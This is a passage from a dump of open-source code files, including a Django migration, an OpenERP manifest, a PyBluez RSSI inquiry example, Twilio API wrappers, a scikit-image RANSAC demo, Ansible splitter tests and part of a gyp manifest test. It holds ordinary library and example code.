'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'licenses.coursesoftware': {
'Meta': {'object_name': 'CourseSoftware'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'licenses.userlicense': {
'Meta': {'object_name': 'UserLicense'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'serial': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'software': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['licenses.CourseSoftware']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
}
}
complete_apps = ['licenses']
|
duyetdev/openerp-6.1.1
|
refs/heads/master
|
openerp/addons/l10n_pe/__openerp__.py
|
8
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Cubic ERP - Teradata SAC (<http://cubicerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Peru Localization Chart Account",
"version": "1.0",
"description": """
Peruvian accounting chart and tax localization, according to the PCGE 2010.
Peruvian chart of accounts and taxes following the SUNAT regulations in force in 2011 (PCGE 2010).
""",
"author": ["Cubic ERP"],
"website": "http://cubicERP.com",
"category": "Localization/Account Charts",
"depends": [
"account_chart",
],
"data":[
"account_tax_code.xml",
"l10n_pe_chart.xml",
"account_tax.xml",
"l10n_pe_wizard.xml",
],
"demo_xml": [
],
"update_xml": [
],
"active": False,
"installable": True,
"certificate" : "0045046493412",
'images': ['images/config_chart_l10n_pe.jpeg','images/l10n_pe_chart.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
BeATz-UnKNoWN/python-for-android
|
refs/heads/master
|
python-modules/pybluez/examples/advanced/inquiry-with-rssi.py
|
47
|
# performs a device inquiry that also reports the RSSI of each
# discovered device
import os
import sys
import struct
import bluetooth._bluetooth as bluez
def printpacket(pkt):
for c in pkt:
sys.stdout.write("%02x " % struct.unpack("B",c)[0])
print
def read_inquiry_mode(sock):
"""returns the current mode, or -1 on failure"""
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# Setup socket filter to receive only events related to the
# read_inquiry_mode command
flt = bluez.hci_filter_new()
opcode = bluez.cmd_opcode_pack(bluez.OGF_HOST_CTL,
bluez.OCF_READ_INQUIRY_MODE)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
bluez.hci_filter_set_event(flt, bluez.EVT_CMD_COMPLETE);
bluez.hci_filter_set_opcode(flt, opcode)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
# first read the current inquiry mode.
bluez.hci_send_cmd(sock, bluez.OGF_HOST_CTL,
bluez.OCF_READ_INQUIRY_MODE )
pkt = sock.recv(255)
status,mode = struct.unpack("xxxxxxBB", pkt)
if status != 0: mode = -1
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
return mode
def write_inquiry_mode(sock, mode):
"""returns 0 on success, -1 on failure"""
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# Setup socket filter to receive only events related to the
# write_inquiry_mode command
flt = bluez.hci_filter_new()
opcode = bluez.cmd_opcode_pack(bluez.OGF_HOST_CTL,
bluez.OCF_WRITE_INQUIRY_MODE)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
bluez.hci_filter_set_event(flt, bluez.EVT_CMD_COMPLETE);
bluez.hci_filter_set_opcode(flt, opcode)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
# send the command!
bluez.hci_send_cmd(sock, bluez.OGF_HOST_CTL,
bluez.OCF_WRITE_INQUIRY_MODE, struct.pack("B", mode) )
pkt = sock.recv(255)
status = struct.unpack("xxxxxxB", pkt)[0]
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
if status != 0: return -1
return 0
def device_inquiry_with_with_rssi(sock):
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# perform a device inquiry on bluetooth device #0
# The inquiry lasts duration * 1.28 seconds (4 * 1.28 = 5.12 seconds here)
# before the inquiry is performed, bluez should flush its cache of
# previously discovered devices
flt = bluez.hci_filter_new()
bluez.hci_filter_all_events(flt)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
duration = 4
max_responses = 255
cmd_pkt = struct.pack("BBBBB", 0x33, 0x8b, 0x9e, duration, max_responses)
bluez.hci_send_cmd(sock, bluez.OGF_LINK_CTL, bluez.OCF_INQUIRY, cmd_pkt)
results = []
done = False
while not done:
pkt = sock.recv(255)
ptype, event, plen = struct.unpack("BBB", pkt[:3])
if event == bluez.EVT_INQUIRY_RESULT_WITH_RSSI:
pkt = pkt[3:]
nrsp = struct.unpack("B", pkt[0])[0]
for i in range(nrsp):
addr = bluez.ba2str( pkt[1+6*i:1+6*i+6] )
rssi = struct.unpack("b", pkt[1+13*nrsp+i])[0]
results.append( ( addr, rssi ) )
print "[%s] RSSI: [%d]" % (addr, rssi)
elif event == bluez.EVT_INQUIRY_COMPLETE:
done = True
elif event == bluez.EVT_CMD_STATUS:
status, ncmd, opcode = struct.unpack("BBH", pkt[3:7])
if status != 0:
print "uh oh..."
printpacket(pkt[3:7])
done = True
elif event == bluez.EVT_INQUIRY_RESULT:
pkt = pkt[3:]
nrsp = struct.unpack("B", pkt[0])[0]
for i in range(nrsp):
addr = bluez.ba2str( pkt[1+6*i:1+6*i+6] )
results.append( ( addr, -1 ) )
print "[%s] (no RRSI)" % addr
else:
print "unrecognized packet type 0x%02x" % ptype
print "event ", event
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
return results
dev_id = 0
try:
sock = bluez.hci_open_dev(dev_id)
except:
print "error accessing bluetooth device..."
sys.exit(1)
try:
mode = read_inquiry_mode(sock)
except Exception, e:
print "error reading inquiry mode. "
print "Are you sure this a bluetooth 1.2 device?"
print e
sys.exit(1)
print "current inquiry mode is %d" % mode
if mode != 1:
print "writing inquiry mode..."
try:
result = write_inquiry_mode(sock, 1)
except Exception, e:
print "error writing inquiry mode. Are you sure you're root?"
print e
sys.exit(1)
if result != 0:
print "error while setting inquiry mode"
print "result: %d" % result
device_inquiry_with_with_rssi(sock)
|
whyscream/dspam-milter
|
refs/heads/master
|
dspam/__init__.py
|
1
|
# Copyright (c) 2012, Tom Hendrikx
# All rights reserved.
#
# See LICENSE for the license.
VERSION = '0.3.5.dev0'
|
mdrumond/tensorflow
|
refs/heads/master
|
tensorflow/python/training/queue_runner.py
|
139
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create threads to run multiple enqueue ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.training.queue_runner_impl import *
# pylint: enable=wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = [
# Documented in training.py:
"QueueRunner",
"add_queue_runner",
"start_queue_runners",
]
remove_undocumented(__name__, _allowed_symbols)
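# Usage sketch of the re-exported symbols (the classic TF1 queue-based input
# pipeline; the tensors involved are illustrative):
#
#     import tensorflow as tf
#     queue = tf.FIFOQueue(capacity=32, dtypes=[tf.float32])
#     enqueue_op = queue.enqueue(tf.random_normal([8]))
#     qr = tf.train.QueueRunner(queue, [enqueue_op] * 4)
#     tf.train.add_queue_runner(qr)
#     with tf.Session() as sess:
#         coord = tf.train.Coordinator()
#         threads = tf.train.start_queue_runners(sess=sess, coord=coord)
#         batch = sess.run(queue.dequeue())   # consumed by the training loop
#         coord.request_stop()
#         coord.join(threads)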
|
PyFilesystem/pyfilesystem
|
refs/heads/master
|
fs/expose/serve/__init__.py
|
20
|
# Work in progress
|
rahulunair/nova
|
refs/heads/master
|
nova/api/openstack/compute/__init__.py
|
10
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# APIRouterV21 was moved down to 'nova.api.openstack.compute.routes' to avoid
# a circular reference problem. Importing APIRouterV21 here keeps api-paste.ini
# working without modification. We are still looking for a chance to move
# APIRouterV21 back here after cleanups.
from nova.api.openstack.compute.routes import APIRouterV21 # noqa
|
ducksboard/libsaas
|
refs/heads/master
|
libsaas/services/twilio/numbers.py
|
4
|
from libsaas import http, parsers
from libsaas.services import base
from libsaas.services.twilio import resource
class AvailablePhoneNumbersBase(resource.TwilioResource):
path = '{0}'
def get_url(self):
path = self.path.format(self.object_id)
return '{0}/{1}'.format(self.parent.get_url(), path)
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class AvailablePhoneNumbersLocal(AvailablePhoneNumbersBase):
path = '{0}/Local'
@base.apimethod
def get(self, AreaCode=None, Contains=None, InRegion=None,
InPostalCode=None, NearLatLong=None, NearNumber=None, InLata=None,
InRateCenter=None, Distance=None):
"""
Fetch available local phone numbers for an account.
:var AreaCode: Find phone numbers in the specified area code.
:vartype AreaCode: str
:var Contains: A pattern to match phone numbers on.
Valid characters are `*` and [0-9a-zA-Z].
The `*` character will match any single digit.
:vartype Contains: str
:var InRegion: Limit results to a particular region (State/Province).
Given a phone number, search within the same Region as that number.
(US and Canada only)
:vartype InRegion: str
:var InPostalCode: Limit results to a particular postal code.
Given a phone number, search within the same postal code as
that number. (US and Canada only)
:vartype InPostalCode: str
:var NearLatLong: Given a latitude/longitude pair lat,long find
geographically close numbers within Distance miles.
(US and Canada only)
:vartype NearLatLong: str
:var NearNumber: Given a phone number, find a geographically close
number within Distance miles. Distance defaults to 25 miles.
(US and Canada only)
:vartype NearNumber: str
:var InLata: Limit results to a specific Local access and transport
area (LATA). Given a phone number, search within the same LATA
as that number.
(US and Canada only)
:vartype InLata: str
:var InRateCenter: Limit results to a specific rate center,
or given a phone number search within the same rate center as
that number. Requires InLata to be set as well.
(US and Canada only)
:vartype InRateCenter: str
:var Distance: Specifies the search radius for a Near- query in miles.
If not specified this defaults to 25 miles.
(US and Canada only)
:vartype Distance: int
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
class AvailablePhoneNumbersTollFree(AvailablePhoneNumbersBase):
path = '{0}/TollFree'
@base.apimethod
def get(self, AreaCode=None, Contains=None):
"""
Fetch available toll-free phone numbers for an account.
:var AreaCode: Find phone numbers in the specified area code.
:vartype AreaCode: str
:var Contains: A pattern to match phone numbers on.
Valid characters are `*` and [0-9a-zA-Z].
The `*` character will match any single digit.
:vartype Contains: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
class AvailablePhoneNumbers(AvailablePhoneNumbersBase):
path = 'AvailablePhoneNumbers'
def get(self, *args, **kwargs):
raise base.MethodNotSupported()
@base.resource(AvailablePhoneNumbersLocal)
def local(self, country_code):
"""
Return a list of local AvailablePhoneNumber resource representations
that match the specified filters, each representing a phone number
that is currently available for provisioning within this account.
"""
return AvailablePhoneNumbersLocal(self, country_code)
@base.resource(AvailablePhoneNumbersTollFree)
def toll_free(self, country_code):
"""
Return a list of toll-free AvailablePhoneNumber resource
representations that match the specified filters, each representing
a phone number that is currently available for provisioning within
this account.
"""
return AvailablePhoneNumbersTollFree(self, country_code)
class IncomingPhoneNumbersBase(resource.TwilioResource):
path = 'IncomingPhoneNumbers'
class IncomingPhoneNumber(IncomingPhoneNumbersBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class IncomingPhoneNumbersMixin(IncomingPhoneNumbersBase):
@base.apimethod
def get(self, PhoneNumber=None, FriendlyName=None,
Page=None, PageSize=None, AfterSid=None):
"""
Fetch incoming phone numbers list for an account.
:var PhoneNumber: Only show the incoming phone number resources
that match this pattern. You can specify partial numbers and
use `*` as a wildcard for any digit.
:vartype PhoneNumber: str
:var FriendlyName: Only show the incoming phone number resources
with friendly names that exactly match this name.
:vartype FriendlyName: str
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class IncomingPhoneNumbersLocal(IncomingPhoneNumbersMixin):
path = 'Local'
class IncomingPhoneNumbersTollFree(IncomingPhoneNumbersMixin):
path = 'TollFree'
class IncomingPhoneNumbers(IncomingPhoneNumbersMixin):
@base.resource(IncomingPhoneNumbersLocal)
def local(self):
return IncomingPhoneNumbersLocal(self)
@base.resource(IncomingPhoneNumbersTollFree)
def toll_free(self):
return IncomingPhoneNumbersTollFree(self)
class OutgoingCallerIdsBase(resource.TwilioResource):
path = 'OutgoingCallerIds'
class OutgoingCallerId(OutgoingCallerIdsBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class OutgoingCallerIds(OutgoingCallerIdsBase):
@base.apimethod
def get(self, PhoneNumber=None, FriendlyName=None,
Page=None, PageSize=None, AfterSid=None):
"""
Fetch outgoing caller ids for an account.
:var PhoneNumber: Only show the incoming phone number resources
that match this pattern. You can specify partial numbers and
use `*` as a wildcard for any digit.
:vartype PhoneNumber: str
:var FriendlyName: Only show the incoming phone number resources
with friendly names that exactly match this name.
:vartype FriendlyName: str
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
|
GGoussar/scikit-image
|
refs/heads/master
|
doc/examples/transform/plot_matching.py
|
21
|
"""
============================
Robust matching using RANSAC
============================
In this simplified example we first generate two synthetic images as if they
were taken from different viewpoints.
In the next step we find interest points in both images and find
correspondences based on a weighted sum of squared differences of a small
neighborhood around them. Note that this measure is only robust towards
linear radiometric and not geometric distortions and is thus only usable with
slight viewpoint changes.
After finding the correspondences we end up having a set of source and
destination coordinates which can be used to estimate the geometric
transformation between both images. However, many of the correspondences are
faulty and simply estimating the parameter set with all coordinates is not
sufficient. Therefore, the RANSAC algorithm is used on top of the normal model
to robustly estimate the parameter set by detecting outliers.
"""
from __future__ import print_function
import numpy as np
from matplotlib import pyplot as plt
from skimage import data
from skimage.util import img_as_float
from skimage.feature import (corner_harris, corner_subpix, corner_peaks,
plot_matches)
from skimage.transform import warp, AffineTransform
from skimage.exposure import rescale_intensity
from skimage.color import rgb2gray
from skimage.measure import ransac
# generate synthetic checkerboard image and add gradient for the later matching
checkerboard = img_as_float(data.checkerboard())
img_orig = np.zeros(list(checkerboard.shape) + [3])
img_orig[..., 0] = checkerboard
gradient_r, gradient_c = (np.mgrid[0:img_orig.shape[0],
0:img_orig.shape[1]]
/ float(img_orig.shape[0]))
img_orig[..., 1] = gradient_r
img_orig[..., 2] = gradient_c
img_orig = rescale_intensity(img_orig)
img_orig_gray = rgb2gray(img_orig)
# warp synthetic image
tform = AffineTransform(scale=(0.9, 0.9), rotation=0.2, translation=(20, -10))
img_warped = warp(img_orig, tform.inverse, output_shape=(200, 200))
img_warped_gray = rgb2gray(img_warped)
# extract corners using Harris' corner measure
coords_orig = corner_peaks(corner_harris(img_orig_gray), threshold_rel=0.001,
min_distance=5)
coords_warped = corner_peaks(corner_harris(img_warped_gray),
threshold_rel=0.001, min_distance=5)
# determine sub-pixel corner position
coords_orig_subpix = corner_subpix(img_orig_gray, coords_orig, window_size=9)
coords_warped_subpix = corner_subpix(img_warped_gray, coords_warped,
window_size=9)
def gaussian_weights(window_ext, sigma=1):
y, x = np.mgrid[-window_ext:window_ext+1, -window_ext:window_ext+1]
g = np.zeros(y.shape, dtype=np.double)
g[:] = np.exp(-0.5 * (x**2 / sigma**2 + y**2 / sigma**2))
g /= 2 * np.pi * sigma * sigma
return g
def match_corner(coord, window_ext=5):
r, c = np.round(coord).astype(np.intp)
window_orig = img_orig[r-window_ext:r+window_ext+1,
c-window_ext:c+window_ext+1, :]
# weight pixels depending on distance to center pixel
weights = gaussian_weights(window_ext, 3)
weights = np.dstack((weights, weights, weights))
# compute sum of squared differences to all corners in warped image
SSDs = []
for cr, cc in coords_warped:
window_warped = img_warped[cr-window_ext:cr+window_ext+1,
cc-window_ext:cc+window_ext+1, :]
SSD = np.sum(weights * (window_orig - window_warped)**2)
SSDs.append(SSD)
# use corner with minimum SSD as correspondence
min_idx = np.argmin(SSDs)
return coords_warped_subpix[min_idx]
# find correspondences using simple weighted sum of squared differences
src = []
dst = []
for coord in coords_orig_subpix:
src.append(coord)
dst.append(match_corner(coord))
src = np.array(src)
dst = np.array(dst)
# estimate affine transform model using all coordinates
model = AffineTransform()
model.estimate(src, dst)
# robustly estimate affine transform model with RANSAC
model_robust, inliers = ransac((src, dst), AffineTransform, min_samples=3,
residual_threshold=2, max_trials=100)
outliers = ~inliers
# compare "true" and estimated transform parameters
print(tform.scale, tform.translation, tform.rotation)
print(model.scale, model.translation, model.rotation)
print(model_robust.scale, model_robust.translation, model_robust.rotation)
# visualize correspondence
fig, ax = plt.subplots(nrows=2, ncols=1)
plt.gray()
inlier_idxs = np.nonzero(inliers)[0]
plot_matches(ax[0], img_orig_gray, img_warped_gray, src, dst,
np.column_stack((inlier_idxs, inlier_idxs)), matches_color='b')
ax[0].axis('off')
ax[0].set_title('Correct correspondences')
outlier_idxs = np.nonzero(outliers)[0]
plot_matches(ax[1], img_orig_gray, img_warped_gray, src, dst,
np.column_stack((outlier_idxs, outlier_idxs)), matches_color='r')
ax[1].axis('off')
ax[1].set_title('Faulty correspondences')
plt.show()
|
pgmillon/ansible
|
refs/heads/devel
|
test/units/parsing/test_splitter.py
|
117
|
# coding: utf-8
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.parsing.splitter import split_args, parse_kv
import pytest
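# Each SPLIT_DATA entry is a triple: (input string, expected split_args()
# output, expected parse_kv() output). SPLIT_ARGS and PARSE_KV below slice out
# the pairs used to parametrize the two tests.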
SPLIT_DATA = (
(u'a',
[u'a'],
{u'_raw_params': u'a'}),
(u'a=b',
[u'a=b'],
{u'a': u'b'}),
(u'a="foo bar"',
[u'a="foo bar"'],
{u'a': u'foo bar'}),
(u'"foo bar baz"',
[u'"foo bar baz"'],
{u'_raw_params': '"foo bar baz"'}),
(u'foo bar baz',
[u'foo', u'bar', u'baz'],
{u'_raw_params': u'foo bar baz'}),
(u'a=b c="foo bar"',
[u'a=b', u'c="foo bar"'],
{u'a': u'b', u'c': u'foo bar'}),
(u'a="echo \\"hello world\\"" b=bar',
[u'a="echo \\"hello world\\""', u'b=bar'],
{u'a': u'echo "hello world"', u'b': u'bar'}),
(u'a="multi\nline"',
[u'a="multi\nline"'],
{u'a': u'multi\nline'}),
(u'a="blank\n\nline"',
[u'a="blank\n\nline"'],
{u'a': u'blank\n\nline'}),
(u'a="blank\n\n\nlines"',
[u'a="blank\n\n\nlines"'],
{u'a': u'blank\n\n\nlines'}),
(u'a="a long\nmessage\\\nabout a thing\n"',
[u'a="a long\nmessage\\\nabout a thing\n"'],
{u'a': u'a long\nmessage\\\nabout a thing\n'}),
(u'a="multiline\nmessage1\\\n" b="multiline\nmessage2\\\n"',
[u'a="multiline\nmessage1\\\n"', u'b="multiline\nmessage2\\\n"'],
{u'a': 'multiline\nmessage1\\\n', u'b': u'multiline\nmessage2\\\n'}),
(u'a={{jinja}}',
[u'a={{jinja}}'],
{u'a': u'{{jinja}}'}),
(u'a={{ jinja }}',
[u'a={{ jinja }}'],
{u'a': u'{{ jinja }}'}),
(u'a="{{jinja}}"',
[u'a="{{jinja}}"'],
{u'a': u'{{jinja}}'}),
(u'a={{ jinja }}{{jinja2}}',
[u'a={{ jinja }}{{jinja2}}'],
{u'a': u'{{ jinja }}{{jinja2}}'}),
(u'a="{{ jinja }}{{jinja2}}"',
[u'a="{{ jinja }}{{jinja2}}"'],
{u'a': u'{{ jinja }}{{jinja2}}'}),
(u'a={{jinja}} b={{jinja2}}',
[u'a={{jinja}}', u'b={{jinja2}}'],
{u'a': u'{{jinja}}', u'b': u'{{jinja2}}'}),
(u'a="{{jinja}}\n" b="{{jinja2}}\n"',
[u'a="{{jinja}}\n"', u'b="{{jinja2}}\n"'],
{u'a': u'{{jinja}}\n', u'b': u'{{jinja2}}\n'}),
(u'a="café eñyei"',
[u'a="café eñyei"'],
{u'a': u'café eñyei'}),
(u'a=café b=eñyei',
[u'a=café', u'b=eñyei'],
{u'a': u'café', u'b': u'eñyei'}),
(u'a={{ foo | some_filter(\' \', " ") }} b=bar',
[u'a={{ foo | some_filter(\' \', " ") }}', u'b=bar'],
{u'a': u'{{ foo | some_filter(\' \', " ") }}', u'b': u'bar'}),
(u'One\n Two\n Three\n',
[u'One\n ', u'Two\n ', u'Three\n'],
{u'_raw_params': u'One\n Two\n Three\n'}),
)
SPLIT_ARGS = ((test[0], test[1]) for test in SPLIT_DATA)
PARSE_KV = ((test[0], test[2]) for test in SPLIT_DATA)
@pytest.mark.parametrize("args, expected", SPLIT_ARGS)
def test_split_args(args, expected):
assert split_args(args) == expected
@pytest.mark.parametrize("args, expected", PARSE_KV)
def test_parse_kv(args, expected):
assert parse_kv(args) == expected
|
BobCromwell/gyp
|
refs/heads/master
|
test/win/gyptest-link-update-manifest.py
|
226
|
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure binary is relinked when manifest settings are changed.
"""
import TestGyp
import os
import sys
if sys.platform == 'win32':
import pywintypes
import win32api
import winerror
RT_MANIFEST = 24
class LoadLibrary(object):
"""Context manager for loading and releasing binaries in Windows.
Yields the handle of the binary loaded."""
def __init__(self, path):
self._path = path
self._handle = None
def __enter__(self):
self._handle = win32api.LoadLibrary(self._path)
return self._handle
def __exit__(self, type, value, traceback):
win32api.FreeLibrary(self._handle)
def extract_manifest(path, resource_name):
"""Reads manifest from |path| and returns it as a string.
Returns None if there is no such manifest."""
with LoadLibrary(path) as handle:
try:
return win32api.LoadResource(handle, RT_MANIFEST, resource_name)
except pywintypes.error as error:
if error.args[0] == winerror.ERROR_RESOURCE_DATA_NOT_FOUND:
return None
else:
raise
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
gyp_template = '''
{
'targets': [
{
'target_name': 'test_update_manifest',
'type': 'executable',
'sources': ['hello.cc'],
'msvs_settings': {
'VCLinkerTool': {
'EnableUAC': 'true',
'UACExecutionLevel': '%(uac_execution_level)d',
},
'VCManifestTool': {
'EmbedManifest': 'true',
'AdditionalManifestFiles': '%(additional_manifest_files)s',
},
},
},
],
}
'''
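# Editor's note: UACExecutionLevel selects the <requestedExecutionLevel> value
# embedded in the manifest; the assertions below rely on level 0 mapping to
# 'asInvoker' and level 2 mapping to 'requireAdministrator'.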
gypfile = 'update-manifest.gyp'
def WriteAndUpdate(uac_execution_level, additional_manifest_files, do_build):
with open(os.path.join(CHDIR, gypfile), 'wb') as f:
f.write(gyp_template % {
